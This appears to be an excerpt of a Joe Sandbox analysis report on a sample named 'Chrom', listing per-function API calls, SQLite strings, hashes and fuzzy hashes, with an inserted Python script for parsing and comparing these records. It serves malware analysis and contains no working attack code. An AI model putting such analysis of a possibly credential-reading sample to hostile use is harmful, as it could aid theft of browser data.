• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: ErrorLastMessage_snwprintf
• String ID: Error$Error %d: %s
• API String ID: 313946961-1552265934
• Opcode ID: e1fdb32dfef422dff48cb9ab629eed33cb04251586a29e7e9f8c167c9a74f7e6
• Instruction ID: d9c3214ff741d8e793b5fb5d5340e1d373de9dbbbbb1b4938000c24ebbed5cab
• Opcode Fuzzy Hash: e1fdb32dfef422dff48cb9ab629eed33cb04251586a29e7e9f8c167c9a74f7e6
• Instruction Fuzzy Hash: BFF0277A51020867DB11A794CC02FDA73ACAB45796F0400BBB944A2141DAB89E488E68
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID:
• String ID: foreign key constraint failed$new$oid$old
• API String ID: 0-1953309616
• Opcode ID: 78d1a63a5ea67a9e42337c47af4419ff18a1c500e7b5e2e5722190ef6454fa26
• Instruction ID: 80b6a815d8446b075644860295f848db11862a5b470e777900e0cbaee52b5eda
• Opcode Fuzzy Hash: 78d1a63a5ea67a9e42337c47af4419ff18a1c500e7b5e2e5722190ef6454fa26
• Instruction Fuzzy Hash: 50E19FB1E04209AFDB14DFA5D881AEEBBB5FF48304F10842EE805AB351DB799A41CB55
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: memset
• String ID: VtC$VtC$rows deleted
• API String ID: 2221118986-3271433201
• Opcode ID: 285e4370a89cc5d60ce435c08b76b458e0c9e97a2273653d553d833e96bb1a07
• Instruction ID: 8eee3fd8308e863b15c20577b933f05ddeb2eec06ba64818cf6e3fd673dab534
• Opcode Fuzzy Hash: 285e4370a89cc5d60ce435c08b76b458e0c9e97a2273653d553d833e96bb1a07
• Instruction Fuzzy Hash: 70C1C071E00618ABDF21DF95CC42B9FBBB1EF48314F14105AF904AB282D779AE50DB99
APIs
Strings
• unknown column "%s" in foreign key definition, xrefs: 00433745
• number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004335E2
• foreign key on %s should reference only one column of table %T, xrefs: 004335BA
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: memcpy
• String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
• API String ID: 3510742995-272990098
• Opcode ID: e4adabbe1decd632362e132ce6bab9d224831924daf4b8fb608a03f475e217cd
• Instruction ID: fb1fd52c892a386ff9235e04c27833661dd88198db5bdd6c779901d429b6f073
• Opcode Fuzzy Hash: e4adabbe1decd632362e132ce6bab9d224831924daf4b8fb608a03f475e217cd
• Instruction Fuzzy Hash: C6914EB5A0020ADFCB10DF59C581A9EBBF1FF48315F14815AE805AB352DB35EA41CF99
APIs
• memset.MSVCRT ref: 00411246
  • Part of subcall function 0040D5E2: GetModuleHandleW.KERNEL32(00000000,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D621
  • Part of subcall function 0040D5E2: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D6BA
  • Part of subcall function 0040D5E2: memcpy.MSVCRT(00000000,00000002), ref: 0040D6FA
  • Part of subcall function 0040D5E2: wcscpy.MSVCRT ref: 0040D663
  • Part of subcall function 0040D5E2: wcslen.MSVCRT ref: 0040D681
  • Part of subcall function 0040D5E2: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D68F
  • Part of subcall function 0040AA19: memset.MSVCRT ref: 0040AA3A
  • Part of subcall function 0040AA19: _snwprintf.MSVCRT ref: 0040AA6D
  • Part of subcall function 0040AA19: wcslen.MSVCRT ref: 0040AA79
  • Part of subcall function 0040AA19: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040AA91
  • Part of subcall function 0040AA19: wcslen.MSVCRT ref: 0040AA9F
  • Part of subcall function 0040AA19: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040AAB2
  • Part of subcall function 0040A838: GetSaveFileNameW.COMDLG32(?), ref: 0040A887
  • Part of subcall function 0040A838: wcscpy.MSVCRT ref: 0040A89E
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameSaveString_snwprintf
• String ID: *.csv$*.htm;*.html$*.txt$txt
• API String ID: 1392923015-2111886889
• Opcode ID: aafac17d9ad648619bbc2820d08f5d6f77f7253f9c21e5715a78e07660b7453b
• Instruction ID: 21c56e8af235b710a4191330bbdd055b03883b3d4342fd00990d051e634670c5
• Opcode Fuzzy Hash: aafac17d9ad648619bbc2820d08f5d6f77f7253f9c21e5715a78e07660b7453b
• Instruction Fuzzy Hash: FE31FDB1D00258ABDB00EFE5DC816DDBBB8FB44318F20407BE945BB281DB389A458B59
APIs
• memset.MSVCRT ref: 00449C9B
• memset.MSVCRT ref: 00449CAB
• memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000020,?,00000000), ref: 00449D0D
• memcpy.MSVCRT(?,?,?,?,?,00000000,00000020,?,00000000), ref: 00449D5A
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: memcpymemset
• String ID: gj
• API String ID: 1297977491-4203073231
• Opcode ID: bc066ce618c8efd45368092d21e9600cda6cc543f99e188020d63ac60b6c492b
• Instruction ID: 1e6fb78b96cc295ab1e64a1d2520aab5d7b4c62cf2bfa8bfbbde786d8273fed9
• Opcode Fuzzy Hash: bc066ce618c8efd45368092d21e9600cda6cc543f99e188020d63ac60b6c492b
• Instruction Fuzzy Hash: D3212CF37003405BE724AA79CC81A5B779D9FCA318F06481EF6468B342E57EDA05C725
APIs
• wcslen.MSVCRT ref: 0040B804
• free.MSVCRT ref: 0040B827
  • Part of subcall function 00409FB3: malloc.MSVCRT ref: 00409FCF
                                                                                                                                                          • Part of subcall function 00409FB3: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040B018,00000002,?,00000000,?,0040B34B,00000000,?,00000000), ref: 00409FE7
                                                                                                                                                          • Part of subcall function 00409FB3: free.MSVCRT ref: 00409FF0
                                                                                                                                                        • free.MSVCRT ref: 0040B84A
                                                                                                                                                        • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,6n@,00406D1D,6n@,00000000,?,?,00406E36,00000000), ref: 0040B86E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$memcpy$mallocwcslen
                                                                                                                                                        • String ID: 6n@
                                                                                                                                                        • API String ID: 726966127-1376077705
                                                                                                                                                        • Opcode ID: 9c7b5ed43217881e54566e3aaae3d088c30ddfe0133c3a6c6c6cf896538b121f
                                                                                                                                                        • Instruction ID: 2a297e2a749568a602d4fdd98617bb0f2def5a372598a852c8599cd2a9d3c103
                                                                                                                                                        • Opcode Fuzzy Hash: 9c7b5ed43217881e54566e3aaae3d088c30ddfe0133c3a6c6c6cf896538b121f
                                                                                                                                                        • Instruction Fuzzy Hash: 1E21C372500704EFD730EF18C881C9AB7F9EF453247108A2EF852976A1C735B905CB98
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E428
                                                                                                                                                          • Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E436
                                                                                                                                                          • Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E447
                                                                                                                                                          • Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E45E
                                                                                                                                                          • Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E467
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,004117F5,00000000,?,004122B3,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E49D
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,004117F5,00000000,?,004122B3,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E4B0
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,004117F5,00000000,?,004122B3,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E4C3
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,004117F5,00000000,?,004122B3,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E4D6
                                                                                                                                                        • free.MSVCRT ref: 0040E50F
                                                                                                                                                          • Part of subcall function 0040B02A: free.MSVCRT ref: 0040B031
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ??3@$free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2241099983-0
                                                                                                                                                        • Opcode ID: fa52488197fdfc127ac9ce96ddf417577be6c4487586e28702ed92ce05cb8b53
                                                                                                                                                        • Instruction ID: 42ba5fb2483a06204b9652fd9eb83631712146579ad8a5126b95c8e5bf80326c
                                                                                                                                                        • Opcode Fuzzy Hash: fa52488197fdfc127ac9ce96ddf417577be6c4487586e28702ed92ce05cb8b53
                                                                                                                                                        • Instruction Fuzzy Hash: 0E018E326029305BCA357B2B944142FB394FE95B2431A497FF8157B282DF3CAC5186EE
                                                                                                                                                        APIs
                                                                                                                                                        • AreFileApisANSI.KERNEL32 ref: 004193EE
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0041940E
                                                                                                                                                        • malloc.MSVCRT ref: 00419414
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00419432
                                                                                                                                                        • free.MSVCRT ref: 0041943B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4053608372-0
                                                                                                                                                        • Opcode ID: 2ce22bffb2f624be5e4887deef8eb2f5bb9639764511aad977b4a3fe63ad4965
                                                                                                                                                        • Instruction ID: 2534f474cf9bcd12f65d63d56baaca5d61982f7a50fdf52695ea10ed44cee065
                                                                                                                                                        • Opcode Fuzzy Hash: 2ce22bffb2f624be5e4887deef8eb2f5bb9639764511aad977b4a3fe63ad4965
                                                                                                                                                        • Instruction Fuzzy Hash: A40181B150411CBEAB115BA5DC84CBF7BACEA453EC720427AF414E2190D6344E4196B5
                                                                                                                                                        APIs
                                                                                                                                                        • GetParent.USER32(?), ref: 0040D901
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0040D90E
                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 0040D919
                                                                                                                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D929
                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D945
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4247780290-0
                                                                                                                                                        • Opcode ID: d02ceeb989c3102075357568c0cbbbc984dee6c70047c108da9a167d24dee429
                                                                                                                                                        • Instruction ID: 0a594369ed784f6632fdda1da01060cc62096c5628082a149af8216bf0db4298
                                                                                                                                                        • Opcode Fuzzy Hash: d02ceeb989c3102075357568c0cbbbc984dee6c70047c108da9a167d24dee429
                                                                                                                                                        • Instruction Fuzzy Hash: D3018C3A801029BBDB119BA59C49EFFBFBCEF46710F00402AF901E2090D7789506CBA4
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00409C82: CreateFileW.KERNELBASE(00000003,80000000,00000003,00000000,00000003,00000000,00000000,0040D0E2,0040118B,0040118B,?,?,?,?,000003FF), ref: 00409C94
                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00414948,?,?,?,?,00000104), ref: 00446555
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 00446569
                                                                                                                                                        • memset.MSVCRT ref: 00446578
                                                                                                                                                          • Part of subcall function 0040A8AE: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040D11F,?,?,00000000), ref: 0040A8C5
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0044659B
                                                                                                                                                          • Part of subcall function 0044632F: memchr.MSVCRT ref: 0044636A
                                                                                                                                                          • Part of subcall function 0044632F: memcpy.MSVCRT(?,0044F98C,0000000B,?,?,?,00000000,00000000,00000000), ref: 0044640E
                                                                                                                                                          • Part of subcall function 0044632F: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00446420
                                                                                                                                                          • Part of subcall function 0044632F: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00446448
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004465A2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1471605966-0
                                                                                                                                                        • Opcode ID: b10e60e63540a25e64c8f52e86f8898149edc7e427002224bebf473f2803b541
                                                                                                                                                        • Instruction ID: b0bb4d93dabac42749b0baec13122cd485f3faf15da61d3af90c3903c02b6b6c
                                                                                                                                                        • Opcode Fuzzy Hash: b10e60e63540a25e64c8f52e86f8898149edc7e427002224bebf473f2803b541
                                                                                                                                                        • Instruction Fuzzy Hash: 99F0F6725012107AE6207732AC89E5B7B9CDFD7375F12483FF916911D3EA388804817A
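The per-function records in this listing (the `APIs` call list with `ref:` addresses, then the `Similarity` block with `API ID`, `Opcode ID`, `Instruction ID` and `Instruction Fuzzy Hash`) are the fields an analyst pivots on when comparing this sample's routines with other reports. The Python script below is an added example, not part of the Joe Sandbox report or its tooling: it parses records in this text format, keeps `Part of subcall function …` lines tagged with their callee address, computes a cheap API-name overlap between two routines, and flags routines whose call order matches an open/size/read/close file-access pattern, such as the `CreateFileW` / `GetFileSize` / `ReadFile` / `CloseHandle` routine above. The sample input is an abridged copy of two records from this page; the pattern list, regexes and helper names are the example's own assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample input: an abridged copy of two function records from the listing
# above; "Associated ... Download File" link lines and some subcall lines are omitted.
SAMPLE = """\
APIs
• AreFileApisANSI.KERNEL32 ref: 004193EE
• WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0041940E
• malloc.MSVCRT ref: 00419414
• WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00419432
• free.MSVCRT ref: 0041943B
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ByteCharMultiWide$ApisFilefreemalloc
• String ID:
• Instruction Fuzzy Hash: A40181B150411CBEAB115BA5DC84CBF7BACEA453EC720427AF414E2190D6344E4196B5
APIs
  • Part of subcall function 00409C82: CreateFileW.KERNELBASE(00000003,80000000,00000003,00000000,00000003,00000000,00000000,0040D0E2,0040118B,0040118B,?,?,?,?,000003FF), ref: 00409C94
• GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00414948,?,?,?,?,00000104), ref: 00446555
• ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 00446569
• memset.MSVCRT ref: 00446578
  • Part of subcall function 0040A8AE: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040D11F,?,?,00000000), ref: 0040A8C5
• ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0044659B
• CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004465A2
Similarity
• API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
• Instruction Fuzzy Hash: 99F0F6725012107AE6207732AC89E5B7B9CDFD7375F12483FF916911D3EA388804817A
"""

# One "name.MODULE(args), ref: ADDR" line; subcall lines also carry the callee address.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^.(\s]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Any other "• Key: value" line of a record (API ID, Instruction Fuzzy Hash, Source File, ...).
KV_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+?):\s*(?P<val>.*?)\s*$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str] = None  # address of the inlined callee, if this is a subcall line


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)  # "API ID", "Instruction Fuzzy Hash", ...

    @property
    def fuzzy_hash(self):
        return self.meta.get("Instruction Fuzzy Hash", "")

    def direct_names(self):
        return [c.name for c in self.calls if c.subcall_of is None]

    def all_names(self):
        return [c.name for c in self.calls]


def parse_report(text):
    """Split the listing into one FunctionRecord per 'APIs' block."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            current.calls.append(ApiCall(m["name"], m["module"], args, m["ref"].upper(), m["sub"]))
            continue
        m = KV_RE.match(line)
        if m:
            current.meta[m["key"]] = m["val"]
    return records


def has_call_sequence(record, names):
    """True if `names` occur in this order (not necessarily adjacent), subcalls included."""
    remaining = iter(record.all_names())
    return all(any(n == want for n in remaining) for want in names)


def jaccard(a, b):
    """Overlap of called API names: a first-pass similarity between two routines."""
    sa, sb = set(a.all_names()), set(b.all_names())
    return len(sa & sb) / len(sa | sb) if sa | sb else 0.0


# Hypothetical triage pattern (example's own): open a file, size it, read it, close it.
FILE_READ_PATTERN = ["CreateFileW", "GetFileSize", "ReadFile", "CloseHandle"]


def find_file_readers(records):
    return [r for r in records if has_call_sequence(r, FILE_READ_PATTERN)]
```

Run on the full report text, `find_file_readers` narrows hundreds of records to the few that read files from disk, and `fuzzy_hash` gives a key to look those routines up in reports for other samples. The subsequence check deliberately tolerates intervening calls (here the `??2@YAPAXI@Z` / `memset` buffer set-up between `GetFileSize` and `ReadFile`), because Joe Sandbox interleaves subcall lines with the caller's own calls.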
APIs
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E428
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E436
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E447
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E45E
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040E654,?,?,?,004036B0,?,?,004121F5,00000000,00000000,?,00000000), ref: 0040E467
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
APIs
  • Part of subcall function 0040B7F7: wcslen.MSVCRT ref: 0040B804
  • Part of subcall function 0040B7F7: free.MSVCRT ref: 0040B827
  • Part of subcall function 0040B7F7: free.MSVCRT ref: 0040B84A
  • Part of subcall function 0040B7F7: memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,6n@,00406D1D,6n@,00000000,?,?,00406E36,00000000), ref: 0040B86E
• memset.MSVCRT ref: 00406D33
